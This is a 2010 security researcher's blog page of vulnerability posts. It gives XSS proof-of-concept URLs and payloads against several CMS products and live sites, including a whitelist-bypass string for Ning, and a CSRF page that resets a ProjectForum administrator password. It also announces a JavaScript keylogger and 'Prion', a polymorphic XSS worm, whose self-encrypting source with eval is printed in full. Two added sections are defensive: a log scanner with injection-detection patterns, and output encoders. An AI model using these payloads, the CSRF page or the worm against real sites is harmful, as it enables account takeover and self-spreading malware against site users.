This site is soon to be deprecated by http://www.johnleitch.net
Showing posts with label cross-site scripting.

Sunday, July 11, 2010

ImpressCMS 1.2.1 Final Reflected Cross-site Scripting

A reflected cross-site scripting vulnerability in ImpressCMS 1.2.1 Final can be exploited to execute arbitrary JavaScript.

PoC
http://localhost/impresscms/plugins/csstidy/css_optimiser.php?url=%22%3E%3Cscript%3Ealert(0)%3C/script%3E

RunCMS 2.1 Magpie RSS Module Reflected Cross-site Scripting

A reflected cross-site scripting vulnerability in RunCMS 2.1 Magpie RSS Module can be exploited to execute arbitrary JavaScript.

PoC
http://localhost/runcms2.1/modules/headlines/magpierss/scripts/magpie_debug.php?url=%3Cscript%3Ealert(0)%3C/script%3E

PeteWiki 0.6 Reflected XSS

A reflected cross-site scripting vulnerability in PeteWiki 0.6 can be exploited to execute arbitrary JavaScript.

PoC
http://localhost/petewiki/index.php?show=%3Cscript%3Ealert(0)%3C/script%3E

Lion Wiki 3.2.3 Reflected Cross-site Scripting

A reflected cross-site scripting vulnerability in Lion Wiki 3.2.3 can be exploited to execute arbitrary JavaScript.

PoC
http://localhost/lionwiki/index.php?error=%3Cscript%3Ealert(0)%3C/script%3E&page=a

Monday, July 5, 2010

nuBuilder 10.04.20 Reflected XSS

An XSS vulnerability in nuBuilder 10.04.20 can be exploited to execute arbitrary JavaScript.

PoC
http://localhost/nubuilder-10.04.20/productionnu2/nuedit.php?f=%3Cscript%3Ealert(0)%3C/script%3E

News Office 2.0.18 Reflected XSS

An XSS vulnerability in News Office 2.0.18 can be exploited to execute arbitrary JavaScript.

PoC
http://localhost/newsoffice/news_show.php?n-user=a&n-cat='%3E%3Cscript%3Ealert(0)%3C/script%3E

Bit Weaver 2.7 Reflected XSS

An XSS vulnerability in Bit Weaver 2.7 can be exploited to execute arbitrary JavaScript.

PoC
http://localhost/bitweaver/themes/preview_image.php?fImg=%22%3E%3Cscript%3Ealert(0)%3C/script%3E

odCMS 1.07 Reflected XSS

An XSS vulnerability in odCMS 1.07 can be exploited to execute arbitrary JavaScript.

PoC
http://localhost/odcms/codes/archive.php?design=%3Cscript%3Ealert(0)%3C/script%3E

NetworX 1.0.3 Reflected XSS

An XSS vulnerability in NetworX 1.0.3 can be exploited to execute arbitrary JavaScript.

PoC
http://localhost/networx/group_connections_list_popup.php?group_id=%22%3E%3Cscript%3Ealert(0)%3C/script%3E

Orbis 1.0.2 Reflected XSS

An XSS vulnerability in Orbis 1.0.2 can be exploited to execute arbitrary JavaScript.

PoC
http://localhost/orbis/admin/editors/text/editor-body.php?s=%22%3E%3Cscript%3Ealert(0)%3C/script%3E

Thursday, July 1, 2010

Wiki Web Help 0.2.7 Persistent/Reflected XSS

Several XSS vulnerabilities in Wiki Web Help 0.2.7 can be exploited to execute arbitrary JavaScript.

Exploit
Persistent: Event attributes are not removed from user submitted HTML elements.

Reflected: The rev query string field of revert.php does not HTML encode user submitted data.


PoC
Persistent: <div onmouseover="alert(0)" style="margin:-500px;width:9999px;height:9999px;position:absolute;"></div>

Reflected: http://localhost/wwh/revert.php?rev=%3Cscript%3Ealert(0)%3C/script%3E
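Every reflected PoC above has the same shape: a percent-encoded `<script>` element or a `">` attribute breakout inside a query-string parameter. That makes this class of probe easy to spot after the fact in web server access logs. The following is an added example, not code from the original posts or from any of the products named: it URL-decodes each query parameter of a combined-log-format request line and flags values that contain markup rather than ordinary text. The log lines are constructed for the example, using the request paths from the advisories above; the detection patterns are an assumption about what "looks like injected markup" and should be tuned to the application.

```javascript
// Added example (not from the original post): flag reflected-XSS probes in
// web server access logs. Each query parameter is URL-decoded and checked
// for markup that opens a script element, closes an attribute, or adds an
// inline event handler. The log lines are constructed for this example
// using the request paths from the advisories above.

const SAMPLE_LOG = [
  '10.0.0.5 - - [11/Jul/2010:12:00:01 +0000] "GET /lionwiki/index.php?error=%3Cscript%3Ealert(0)%3C/script%3E&page=a HTTP/1.1" 200 512',
  '10.0.0.5 - - [11/Jul/2010:12:00:02 +0000] "GET /bitweaver/themes/preview_image.php?fImg=%22%3E%3Cscript%3Ealert(0)%3C/script%3E HTTP/1.1" 200 310',
  '10.0.0.9 - - [11/Jul/2010:12:00:03 +0000] "GET /lionwiki/index.php?page=Main HTTP/1.1" 200 2048',
  '10.0.0.9 - - [11/Jul/2010:12:00:04 +0000] "GET /wwh/revert.php?rev=%3Cscript%3Ealert(0)%3C/script%3E HTTP/1.1" 200 99',
  '10.0.0.7 - - [11/Jul/2010:12:00:05 +0000] "GET /search?q=%3Cb%3Ehello HTTP/1.1" 200 77',
];

// Combined-log-format request line: "METHOD PATH PROTOCOL".
const REQUEST_RE = /"([A-Z]+) ([^ "]+) HTTP\/[\d.]+"/;

// Indicators of markup injection, checked against each decoded parameter
// value. Plain formatting such as <b> is deliberately not matched.
const XSS_INDICATORS = [
  /<\s*script\b/i,        // script element opened
  /<\s*\/\s*script\s*>/i, // script element closed
  /["']\s*>/,             // attribute/tag breakout: "> or '>
  /\bon[a-z]+\s*=/i,      // inline event handler attribute
  /javascript\s*:/i,      // javascript: URL scheme
];

// Decode percent-encoding; '+' is a space in query strings. Malformed
// sequences are returned as-is instead of throwing.
function decodeParam(value) {
  try {
    return decodeURIComponent(value.replace(/\+/g, ' '));
  } catch (e) {
    return value;
  }
}

// Return an array of { name, value, indicator } hits for one log line,
// or an empty array when no parameter looks like injected markup.
function scanLogLine(line) {
  const m = REQUEST_RE.exec(line);
  if (!m) return [];
  const path = m[2];
  const qIndex = path.indexOf('?');
  if (qIndex === -1) return [];
  const hits = [];
  for (const pair of path.slice(qIndex + 1).split('&')) {
    const eq = pair.indexOf('=');
    const name = eq === -1 ? pair : pair.slice(0, eq);
    const value = decodeParam(eq === -1 ? '' : pair.slice(eq + 1));
    for (const re of XSS_INDICATORS) {
      if (re.test(value)) {
        hits.push({ name: decodeParam(name), value, indicator: re.source });
        break; // one indicator per parameter is enough to alert on
      }
    }
  }
  return hits;
}

// Scan a whole log; returns only the lines (1-based) that produced hits.
function scanLog(lines) {
  return lines
    .map((line, index) => ({ line: index + 1, hits: scanLogLine(line) }))
    .filter((r) => r.hits.length > 0);
}

for (const r of scanLog(SAMPLE_LOG)) {
  const summary = r.hits.map((h) => `${h.name} (${h.indicator})`).join(', ');
  console.log(`line ${r.line}: ${summary}`);
}
```

Run with `node`; lines 1, 2 and 4 of the sample are reported, while the benign `page=Main` and `q=<b>hello` requests are not. Scanning the decoded value is the important part: the raw log line never contains the literal string `<script>`, only `%3Cscript%3E`.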

Thursday, May 13, 2010

ProjectForum 6.5.2.2978 XSRF / XSS

A cross-site request forgery vulnerability in ProjectForum 6.5.2.2978 can be exploited to reconfigure the server (e.g. admin password, create group password, port) with a malicious GET request.

PoC:
<html>
<body>
<img src="http://localhost/admin/site.html?adminpasswd=new_password&adminpasswd2=new_password&port=80&theme=default&createpasswd=new_password&createpasswd2=new_password&action=Save+Changes&formSubmitted=1" />
</body>
</html>



Several reflected and persistent cross-site scripting vulnerabilities are present.

PoC:
Reflected:
http://localhost/1/admin/newpage.html?name=%22%3E%3Cscript%3Ealert(0)%3C/script%3E

Persistent:
Edit a page and add the following
http://"onmouseover="alert(0)"style="position:absolute;top:0;left:0;width:9999px;height:9999px;

Saturday, May 8, 2010

Tumblr.com Persistent XSS

onmouseover attributes added to user-submitted markup via an HTTP proxy are not stripped.

Exploit: Create a new link, add a description, and set the HTML to <h1>test</h1>. Submit the form and capture the request using an HTTP proxy (e.g. Fiddler). Change the post[three] value to <h1 onmouseover="alert(0)">test</h1> and resume the request.

PoC: http://asdfffffffff.tumblr.com/

Sunday, May 2, 2010

Friendster.com Persistent XSS

Data submitted via the album description and a few other fields is not properly escaped before being rendered into JavaScript.

Exploit: \";alert(0);//

PoC: http://www.friendster.com/viewalbums.php?uid=120927091

Monday, April 26, 2010

Ning.com Persistent XSS

Less than and greater than characters submitted in the descriptions of albums, images and probably others are unencoded. Any tags submitted in such fields are subjected to whitelist validation, but this can be bypassed by prepending a less than character to the injected open and close tags.

Exploit: <<script>alert(0)//<</script>

PoC: http://coniferous.ning.com/photo/792231134-1
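The three persistent issues above, together with the reflected ones earlier on this page, cover the usual output contexts: an attribute value broken out of with `">`, a JavaScript string literal broken out of with `\";`, and an HTML body where a tag filter is bypassed with doubled brackets. The following is an added example, not code from the original posts or from Tumblr, Friendster or Ning: a pair of context-specific encoders and a small album template that applies them, checked against the exact payloads quoted above. It makes no assumption about how Ning's whitelist validator works; the point is that encoding `<` and `>` rather than stripping tags leaves nothing for a parser-confusion trick like `<<script>` to exploit. The template and the `roundTripJs` self-check are constructed for the example.

```javascript
// Added example (not from the original posts, and not any of the named
// sites' code): context-aware output encoding for the two sinks these
// advisories describe, an HTML text/attribute position and a JavaScript
// string literal. Encoding replaces tag stripping, so doubled brackets
// such as <<script> have nothing to bypass.

// The five HTML-significant characters as entities. Safe for text nodes
// and for quoted attribute values.
const HTML_ENTITIES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
function encodeHtml(s) {
  return String(s).replace(/[&<>"']/g, (ch) => HTML_ENTITIES[ch]);
}

// Escape a value for placement inside a double-quoted JS string literal.
// Everything outside a small alphanumeric set becomes \xHH or \uHHHH, so
// quotes, backslashes and a literal </script> can neither end the string
// nor end the enclosing <script> element.
function encodeJsString(s) {
  const str = String(s);
  let out = '';
  for (let i = 0; i < str.length; i++) {
    const ch = str[i];
    const code = str.charCodeAt(i);
    if (/[A-Za-z0-9 ,._-]/.test(ch)) {
      out += ch;
    } else if (code < 0x100) {
      out += '\\x' + code.toString(16).toUpperCase().padStart(2, '0');
    } else {
      out += '\\u' + code.toString(16).toUpperCase().padStart(4, '0');
    }
  }
  return out;
}

// Constructed album fragment: the description lands in an attribute, in a
// text node and in an inline script variable, each with its own encoder.
function renderAlbum(description) {
  return [
    '<img src="/album.png" title="' + encodeHtml(description) + '" />',
    '<p>' + encodeHtml(description) + '</p>',
    '<script>var description = "' + encodeJsString(description) + '";</script>',
  ].join('\n');
}

// Self-checks: the rendered fragment must contain exactly one <script>
// element (the template's own), and the JS literal must evaluate back to
// the original value, proving the escaping is lossless.
function countScriptTags(html) {
  return (html.match(/<script\b/gi) || []).length;
}
function roundTripJs(value) {
  return new Function('return "' + encodeJsString(value) + '";')();
}

// The payloads quoted in the advisories on this page.
const PAYLOADS = [
  '"><script>alert(0)</script>',   // attribute breakout (reflected PoCs)
  '\\";alert(0);//',               // JS string breakout (Friendster)
  '<<script>alert(0)//<</script>', // doubled-bracket bypass (Ning)
];
function allPayloadsContained() {
  return PAYLOADS.every((p) => countScriptTags(renderAlbum(p)) === 1 && roundTripJs(p) === p);
}

console.log(renderAlbum(PAYLOADS[2]));
console.log('all payloads contained: ' + allPayloadsContained());
```

The encoder must match the sink: `encodeHtml` is wrong inside a script block (the browser's HTML parser does not decode entities there) and `encodeJsString` is wrong inside an attribute, which is why the template calls a different function for each position.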

Sunday, April 25, 2010

Javascript Keylogger 1.4 Released

A Python HTTP server has been added to allow for greater cross-platform compatibility.

Download 1

Download 2

Sunday, April 11, 2010

Prion 1.3 Released - Polymorphic XSS Worm

Because of Prion's large memory footprint it isn't suitable for use with every XSS vulnerability. For this reason I decided to create Prion Lite, a scaled down version of Prion small enough to be used with most XSS vulnerabilities, reflected or persistent. Of course this comes at a cost: unlike Prion, which carries its entire codebase with it, instances of the new Lite version must reference an off-site javascript file, another piece of evidence for anyone that might be looking for such things.

1.3 Changes
Cleaned up code
Prion lite added
Mickey mouse encryption algorithm updated (Prion lite only)
Reorder transformation added (Prion lite only)
Miscellaneous bug fixes

Download

Monday, April 5, 2010

Prion 1.2 Released - Polymorphic XSS Worm

Prion 1.2 is out, and it's quite an improvement over the last version. The updated encoding algorithm eliminated a lot of bloat, and the new code transformations make the decryptor of each worm instance unique.

1.2 Changes
Integer splitting transformation added
Variable rename transformation added
Added compressed version
Test UI updated

Download



Monday, March 29, 2010

Prion 1.1 Released - Polymorphic XSS Worm

I've affectionately named my worm Prion and released a new version with several browser compatibility fixes and a new test page (embedded below). Click the execute button a few times to see it work.

Old sample removed. An updated version can be found here

Download

Sunday, March 28, 2010

Polymorphic XSS Worm

Note: This entry is out of date; several fixes have been made. New download here

As the title suggests, here is a generic, polymorphic XSS worm. With each infection the worm re-encrypts itself using a basic XOR cipher. The only piece missing is the code that sends the obfuscated script (stored in the encoded variable) to its next target, likely a persistent XSS vulnerability. Below is the complete source. To see it in action, save the source to an HTML file and view it. The JavaScript output to the text area is the repackaged worm; to test the repackaged source, replace the JavaScript of the sample below with the encrypted code and view the page again.


Polymorphic XSS Worm Source


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
    <title>Polymorphic XSS Worm</title>
</head>
<body>
    <textarea id="xssWorm" style="width:400px;height:600px;"></textarea>

    <script type="text/javascript">
    /* Polymorphic XSS Worm by John Leitch - john.leitch5@gmail.com */

    /*worm start*/
    var startToken = '/*worm start*/',
        endToken = '/*worm ' + 'end*/';

    function encode(code) {
        var key = Math.floor(Math.random() * 256);

        var packed = startToken + 'var k=' + key + ';var a=[';

        for (var i = 0; i < code.length; i++) {
            packed += (code.charCodeAt(i) ^ key) + ',';
        }

        packed += '];var d=\'\';' +
            'for (var i=0;i<a.length;i++)' +
            '{d+=String.fromCharCode(a[i]^k);}eval(d);' + endToken;

        return packed;
    }

    function decode(code) {
        var keyMatch = code.match(/var\sk=(\d+)/);

        if (keyMatch == null) {
            alert('key not found');

            return;
        }

        var key = keyMatch[1];

        var codeMatch = code.match(/var\sa=\[([\d{1,3},]+)\];/);

        if (codeMatch == null) {
            alert('packed code not found');

            return;
        }

        var unpacked = '';

        var codeBytes = codeMatch[1].split(',');

        for (var i = 0; i < codeBytes.length; i++) {
            if (!codeBytes[i]) {
                continue;
            }

            unpacked += String.fromCharCode(codeBytes[i] ^ key);
        }

        return unpacked;
    }

    function findSelf(response) {
        var x = response.indexOf(startToken) + startToken.length;
        var y = response.indexOf(endToken, x);

        var code = response.substring(x, y);

        return code;
    }

    var code = findSelf(document.body.innerHTML);

    if (code.indexOf('var k=') == 0) {
        code = decode(code);
    }

    var encoded = encode(code);

    // This is where the newly obfuscated worm (stored in encoded)
    // is passed on to its next target. But because we don't have a
    // target we'll spit the newly obfuscated code out to a textarea.

    document.getElementById('xssWorm').value = encoded;
    /*worm end*/
    </script>
</body>
</html>